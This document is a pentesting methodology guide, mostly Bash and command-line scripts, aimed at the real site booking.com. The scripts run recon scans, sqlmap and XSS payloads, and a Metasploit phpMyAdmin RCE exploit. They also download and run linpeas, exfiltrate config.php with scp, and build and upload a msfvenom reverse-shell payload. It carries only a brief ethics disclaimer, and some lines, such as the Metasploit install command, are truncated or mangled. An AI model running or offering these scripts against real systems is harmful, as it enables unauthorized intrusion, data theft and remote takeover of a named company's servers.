This guide outlines a detailed blackbox pentesting methodology with Bash script samples, focusing on reconnaissance, scanning, exploitation, and post-exploitation. Tools like Nessus, Subfinder, Nmap, Nikto, SQLmap, XSStrike, and Metasploit are utilized.
- Authorization: Ensure legal permission to test
booking.com. - Environment Setup: Install all necessary tools (see Common Tools).
- Documentation: Log all steps and findings for reporting.
Use OSINT techniques to gather information without actively interacting with the target.
#!/bin/bash
# Passive Recon Script
echo "[*] Starting passive reconnaissance on booking.com"
# WHOIS lookup
echo "[*] Running WHOIS lookup..."
whois booking.com > whois.txt
# Subdomain enumeration
echo "[*] Enumerating subdomains using Subfinder..."
subfinder -d booking.com -o subdomains.txt
# DNS record enumeration
echo "[*] Fetching DNS records..."
dig booking.com any > dns_records.txt
# Shodan search
echo "[*] Searching Shodan..."
shodan search "booking.com" > shodan_results.txt
echo "[*] Reconnaissance complete. Results saved to respective files."#!/bin/bash
# Active Recon Script
echo "[*] Starting active reconnaissance on booking.com"
# Ping sweep
echo "[*] Performing ping sweep..."
for ip in $(seq 1 254); do
ping -c 1 185.32.1.$ip | grep "bytes from" | cut -d " " -f 4 | tr -d ":" &
done
# Nmap scanning
echo "[*] Scanning for open ports with Nmap..."
nmap -sS -p- -T4 booking.com -oN nmap_full_scan.txt
echo "[*] Active reconnaissance complete."- Tool: Nessus
- Open Nessus GUI.
- Create a new scan for
booking.com. - Export results as
nessus_scan_results.html.
nikto -h https://booking.com -output nikto_scan_results.txt#!/bin/bash
# Enumeration Script
echo "[*] Enumerating directories and files using Gobuster..."
gobuster dir -u https://booking.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster_results.txt
echo "[*] Running SSL/TLS check with SSLScan..."
sslscan booking.com > sslscan_results.txtsqlmap -u "https://booking.com/search?query=hotel" --batch --dbsxsstrike -u "https://booking.com/search?query=<script>alert('XSS')</script>" -o xsstrike_results.txt#!/bin/bash
# Metasploit Automation Script
msfconsole -q -x "
use exploit/multi/http/phpmyadmin_lfi_rce;
set RHOSTS booking.com;
set RPORT 80;
set TARGETURI /;
exploit;
"wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.shscp [email protected]:/var/www/html/config.php ./exfiltrated_config.phpmsfvenom -p php/meterpreter_reverse_tcp LHOST=<your_ip> LPORT=4444 -f raw > shell.php
curl -X POST -F "[email protected]" https://booking.com/upload- Document Findings:
- Include results from all tools (e.g.,
whois.txt,nmap_full_scan.txt,nessus_scan_results.html).
- Include results from all tools (e.g.,
- Recommendations:
- Provide actionable fixes (e.g., WAF setup, input validation, patch management).
| Tool | Purpose | Installation Command |
|---|---|---|
| Subfinder | Subdomain enumeration | sudo apt install subfinder |
| Nmap | Network scanning | sudo apt install nmap |
| Nikto | Web server vulnerability scanning | sudo apt install nikto |
| SQLmap | SQL injection testing | sudo apt install sqlmap |
| XSStrike | XSS vulnerability testing | pip install xsstrike |
| Metasploit | Exploitation framework | `curl https://raw.githubusercontent.com/rapid7/metasploit/master/configure.sh |
| Gobuster | Directory brute-forcing | sudo apt install gobuster |
| LinPEAS | Privilege escalation checker | wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh |
This methodology is for ethical penetration testing and educational purposes only.